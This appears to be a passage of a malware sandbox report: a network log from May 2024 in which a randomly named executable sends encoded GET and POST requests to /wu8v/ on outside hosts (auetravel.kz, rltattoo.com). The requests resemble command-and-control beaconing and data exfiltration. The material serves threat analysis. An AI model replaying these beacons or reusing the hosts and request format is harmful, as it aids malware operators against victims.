                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 6c 32 31 70 77 5a 38 38 47 44 33 75 4f 57 42 51 66 4e 62 4d 5a 5a 6c 71 55 59 57 76 31 65 32 68 6b 4c 37 76 75 32 7a 4a 2b 73 31 41 46 51 73 52 72 5a 42 6b 44 56 74 4d 69 31 48 61 71 2b 74 4c 76 36 51 54 46 44 4f 30 64 75 39 78 51 74 4f 69 51 55 36 54 31 70 58 5a 49 69 37 30 73 34 71 49 66 72 38 41 48 69 79 56 42 46 4f 4d 77 53 6b 35 45 63 56 36 67 54 6d 4a 32 57 79 32 6d 69 73 45 73 68 50 45 34 76 6c 4a 30 45 45 42 6e 7a 6b 37 71 47 33 75 71 36 6b 65 53 75 38 37 6e 46 76 39 35 61 4a 34 58 50 4d 39 38 44 69 4e 4e 73 41 34 74 4e 4e 6c 4f 54 68 42 30 34 41 72 39 45 38 78 6f 68 4c 57 4e 41 53 48 41 41 78 30 2f 39 7a 76 44 6a 36 71 53 64 74 45 4a 44 32 2b 32 53 4a 54 4c 79 43 62 2f 6c 79 4f 42 54 56 51 34 33 42 63 35 74 31 35 71 76 4b 63 62 77 6d 53 67 37 38 55 7a 77 49 46 70 69 4c 53 47 68 4c 2f 75 77 78 4e 33 32 34 53 30 59 37 77 2b 2b 59 45 64 75 4f 53 6f 47 35 47 67 52 65 6c 74 6b 6a 69 4c 70 57 66 77 6a 2b 4e 41 75 37 41 65 6e 79 34 76 75 70 6c 5a 4a 41 68 38 4d 6b 71 6b 56 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=l21pwZ88GD3uOWBQfNbMZZlqUYWv1e2hkL7vu2zJ+s1AFQsRrZBkDVtMi1Haq+tLv6QTFDO0du9xQtOiQU6T1pXZIi70s4qIfr8AHiyVBFOMwSk5EcV6gTmJ2Wy2misEshPE4vlJ0EEBnzk7qG3uq6keSu87nFv95aJ4XPM98DiNNsA4tNNlOThB04Ar9E8xohLWNASHAAx0/9zvDj6qSdtEJD2+2SJTLyCb/lyOBTVQ43Bc5t15qvKcbwmSg78UzwIFpiLSGhL/uwxN324S0Y7w++YEduOSoG5GgReltkjiLpWfwj+NAu7Aeny4vuplZJAh8MkqkVenyyJJ+5CcrPcvTKSnFzVhW76jPsDlO53Pzve9fi33Ctdz+BOcILNk45c7wJL9iSQaV1Yh3NfB+Oo7+ViWMjGGJu5qAu6MvkteqR8W1k6LHg4qtsQgO9RJ8Pth1/LhHi0lQgS6vrieXRAU2yEL0+YDNowqTKqtN93q65bNVT8TYCT2E2A6j6MowwNuD3Dc8HzCVB/7kYvVVCcC8ibiUak5tfRwCZaQ0vM5ChaSDpZyIWkgY12xJ4P5e8PSgItlMKgLvl/FNx4eXUuRjWu2r97G/gELT/DADESlyEUOuu1zxzHegvRyQS4hQ/lt2rYFph2aGpL+Wl32iAqUw1qVy08bmpFdl9O42t27JStNVC5SI/FuR3OPW955Wt8BPkRyTAGVo2jpwzqNUvBJrgkw9jO5E4LiQGCSBRWBVgkdNBgx4izjl2d0BLEFrP7cvg94T5Bw6DxW+rqB6unI7W+M6eBL6PlJ7MXpRbt2bW8Uw8HHfb2/eA2B1U1d/ilyMGCvT69GOlHMbWSpI7z8bYe2AU44e7qcxDhUqx2qcUaQK+eaxzZ5tJxCAGvR8VS1PbElrn2qD8Kju8quxFKZa75BWkzpAt4CWrIMCP6nMofGGSlO5koTIJVjCnXTeR8Vwd1MDhpm8ULYG402mfNOFZwsNdBiDxohCMZHOJc5 [TRUNCATED]
                                                                                                                    May 8, 2024 14:05:50.217628002 CEST350INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:50 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.44974789.35.125.17802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:05:52.744904995 CEST455OUTGET /wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.auetravel.kz
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:05:53.135462999 CEST496INHTTP/1.1 301 Moved Permanently
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:05:52 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 162
                                                                                                                    Connection: close
                                                                                                                    Location: http://auetravel.kz/wu8v/?MdtlcTm=o0dJzo0+KyysCnVnWeLPfMg3QtOn0MLLvJyzkFXrx5kDb0wpr6IDXytzlnmsuKpUsYAyYVSTQNkMYoOoJGqE4svaZh/Kq8S3fINkBD+7AXaHwSZaIMNjuTk=&_X=ClAdyH4P7rA8z
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.44974838.63.111.149802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:05:59.073165894 CEST718OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.rltattoo.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.rltattoo.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 70 4f 57 48 4a 38 74 70 4d 4a 57 51 6b 43 50 57 33 6b 73 64 45 5a 33 58 76 76 68 4e 49 55 36 45 6c 7a 41 53 6a 48 69 76 78 62 4a 45 7a 71 46 75 31 47 4d 2f 4c 4d 70 6f 46 75 52 71 34 64 71 34 35 66 59 51 67 36 73 7a 6b 56 38 38 65 52 68 57 33 72 33 6a 55 33 6d 30 66 45 76 64 43 4b 54 6e 76 66 71 57 45 32 49 42 33 6f 73 4f 75 58 53 65 4b 46 4a 75 39 73 44 5a 6f 32 39 52 6b 77 32 32 32 53 56 4d 4d 34 71 44 5a 62 2b 63 79 67 55 4c 5a 2b 6c 55 35 42 74 33 37 4a 4f 50 73 42 4f 61 56 38 47 55 55 6e 39 4b 53 45 31 45 46 7a 63 51 33 41 6c 49 4b 45 58 44 69 53 6c 6e 46 46 78 30 71 51 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=pOWHJ8tpMJWQkCPW3ksdEZ3XvvhNIU6ElzASjHivxbJEzqFu1GM/LMpoFuRq4dq45fYQg6szkV88eRhW3r3jU3m0fEvdCKTnvfqWE2IB3osOuXSeKFJu9sDZo29Rkw222SVMM4qDZb+cygULZ+lU5Bt37JOPsBOaV8GUUn9KSE1EFzcQ3AlIKEXDiSlnFFx0qQ==
                                                                                                                    May 8, 2024 14:05:59.256957054 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:05:56 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:05:59.256972075 CEST53INData Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.44974938.63.111.149802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:02.765294075 CEST738OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.rltattoo.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.rltattoo.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 70 4f 57 48 4a 38 74 70 4d 4a 57 51 6c 69 2f 57 30 44 59 64 49 70 33 59 67 50 68 4e 42 30 37 4e 6c 7a 63 53 6a 47 6d 2f 78 74 5a 45 7a 4f 4a 75 30 48 4d 2f 4f 4d 70 6f 58 4f 52 6c 38 64 71 6d 35 66 56 76 67 36 67 7a 6b 56 59 38 65 55 46 57 33 63 44 73 62 48 6d 71 4b 30 76 66 50 71 54 6e 76 66 71 57 45 32 63 76 33 73 49 4f 75 6d 43 65 4e 51 6c 74 33 4d 44 65 70 32 39 52 67 77 32 79 32 53 56 55 4d 39 4f 39 5a 64 79 63 79 68 6b 4c 61 73 64 54 33 42 73 38 31 70 50 49 6b 55 7a 52 62 4f 58 54 5a 41 56 37 56 47 67 6b 45 31 4e 4b 6d 78 45 66 59 45 7a 77 2f 56 73 54 49 47 4d 39 78 62 2f 43 41 6f 72 32 2f 51 61 77 59 41 76 52 72 42 54 78 48 4d 67 3d
                                                                                                                    Data Ascii: MdtlcTm=pOWHJ8tpMJWQli/W0DYdIp3YgPhNB07NlzcSjGm/xtZEzOJu0HM/OMpoXORl8dqm5fVvg6gzkVY8eUFW3cDsbHmqK0vfPqTnvfqWE2cv3sIOumCeNQlt3MDep29Rgw2y2SVUM9O9ZdycyhkLasdT3Bs81pPIkUzRbOXTZAV7VGgkE1NKmxEfYEzw/VsTIGM9xb/CAor2/QawYAvRrBTxHMg=
                                                                                                                    May 8, 2024 14:06:02.950977087 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:06:00 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:02.951092005 CEST53INData Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.44975038.63.111.149802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:05.485709906 CEST7734OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.rltattoo.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.rltattoo.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 70 4f 57 48 4a 38 74 70 4d 4a 57 51 6c 69 2f 57 30 44 59 64 49 70 33 59 67 50 68 4e 42 30 37 4e 6c 7a 63 53 6a 47 6d 2f 78 74 52 45 7a 39 42 75 31 6b 6b 2f 4a 4d 70 6f 55 4f 52 6d 38 64 72 6a 35 66 4e 6a 67 36 38 4a 6b 58 77 38 65 32 4e 57 78 74 44 73 4d 33 6d 71 49 30 76 63 43 4b 54 32 76 5a 4b 53 45 32 4d 76 33 73 49 4f 75 6c 4b 65 62 56 4a 74 34 73 44 5a 6f 32 39 64 6b 77 32 4f 32 54 78 75 4d 39 4c 49 5a 4e 53 63 79 43 63 4c 4a 70 4a 54 2f 42 73 2b 34 4a 50 71 6b 55 33 65 62 4f 62 75 5a 46 70 64 56 45 38 6b 46 45 31 64 79 54 59 30 50 6e 6e 72 74 6d 4d 59 4c 30 77 41 2b 71 4c 4e 51 36 48 71 6b 53 71 62 55 43 6d 38 2b 54 6e 69 63 49 6b 4b 31 72 43 38 44 55 58 63 6d 36 6c 54 6e 65 32 68 63 49 54 41 62 50 30 50 79 67 6c 50 6c 61 45 46 5a 41 68 59 2b 39 49 4e 45 79 68 32 62 39 77 2b 58 78 2f 74 37 62 49 57 51 33 69 54 4f 69 47 4b 5a 62 31 48 56 31 75 36 50 6c 6b 38 42 36 46 34 4e 42 50 75 6e 67 4e 51 48 32 74 34 34 6e 76 44 59 2f 6f 62 49 4e 76 4e 6f 76 34 4f 6a 51 6e 6b 6b 31 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=pOWHJ8tpMJWQli/W0DYdIp3YgPhNB07NlzcSjGm/xtREz9Bu1kk/JMpoUORm8drj5fNjg68JkXw8e2NWxtDsM3mqI0vcCKT2vZKSE2Mv3sIOulKebVJt4sDZo29dkw2O2TxuM9LIZNScyCcLJpJT/Bs+4JPqkU3ebObuZFpdVE8kFE1dyTY0PnnrtmMYL0wA+qLNQ6HqkSqbUCm8+TnicIkK1rC8DUXcm6lTne2hcITAbP0PyglPlaEFZAhY+9INEyh2b9w+Xx/t7bIWQ3iTOiGKZb1HV1u6Plk8B6F4NBPungNQH2t44nvDY/obINvNov4OjQnkk1ftyf69fOXkkTeWQ8rTpgKYbZ9JO4I3lcFmkeRUSDtArxac+A+dWTAmUxQmQwsvJci8x64tIiJ43DYAOmN1rKSmdgA/INxuzFyJsrorYUXHX26fX06jbYZTEGBJRTW/TDCWh7qS2I6C2BtSLpX0dulvTwbxlcHbmJjQlY9X/MHbGT59uaA4GBsdRW9Cyag9HAZsD7Vyf/LApr+H8yPS2BjBi6/S0UROP+a9vMNa9VUka/SzNIyOIH5mPgmoJ0ZpPMjlyjOgU7Q1USlr6MQqPn2AC5rdZ1bpfZzo3cczGt8DMQwT5oL41ImhLQVUS43BoDdsutIcxuUgvrTxMZ9a9GRxJ6E/uitPvBDe7JiqxEW/MwI9Nob688RSJ/3XM+13BctGsqbt6LHWHIXfSf1WKKKsIVQh8RlJ+VxW99Q6sr/2HfPDtQa+r3tNLBMyCRRWTls5K6sVx91zskUhQ2jJtyCzjfLEMdW6hGYiC6Gp0tOE9UDz5zs98IhR5iR3ElTPT1STfXoWLTG5z7+KIuVwbg0upex37ZZWx5YlY2FfxAXdbLBn3OIZqF25BWmpYXkODCHxxMIIijozXX3AqT+S+8x3g6mUF2jDJXCuzpzJf5fNS+oYSWsROwbmKP8dLUn825akx/bnLSfWjz86iIjU0/UJpaCblRKYYso5 [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:05.671426058 CEST3086OUTData Raw: 5a 73 66 64 2b 41 33 4e 56 66 32 4d 2f 54 39 57 37 4e 65 48 47 32 37 42 71 77 52 35 50 6a 64 64 78 4c 77 77 5a 6f 36 69 52 50 51 6f 5a 50 4a 6e 6f 6c 69 58 35 62 30 44 72 69 39 55 2b 6f 43 30 6e 48 50 53 6c 6b 51 48 67 54 75 64 68 43 5a 6b 47 42
                                                                                                                    Data Ascii: Zsfd+A3NVf2M/T9W7NeHG27BqwR5PjddxLwwZo6iRPQoZPJnoliX5b0Dri9U+oC0nHPSlkQHgTudhCZkGB8FMLvbwVru4w7ly4HwE9cvcKCGiq9+PFGU/YPlDYvBf5dIjUSjsuMvK8AkUu8DWLsq0uYc9OXCoGK/pRh3t5D1OSwSL4sIM9PcYTD9gttsRMw6GQiLsDsqzihw47JXl/PUiqfSrvc2cESYefHKbbAAQfGbrMIQKXj
                                                                                                                    May 8, 2024 14:06:05.857281923 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Content-Type: text/html
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:06:03 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1163
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> [TRUNCATED]
                                                                                                                    May 8, 2024 14:06:05.857295036 CEST53INData Raw: 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.44975138.63.111.149802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:06:08.200114965 CEST455OUTGET /wu8v/?MdtlcTm=kM+nKItVIOm9nxv083MKEZreo78kZmjvmDxFimKXw4NllaUxz2FZA/AxFfoR4c/c0+8T1IsyqFRuVBpkxsrpf3yFfXK/MNDg35iPLFQJ6s8K1nL5VHh3xe8=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.rltattoo.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
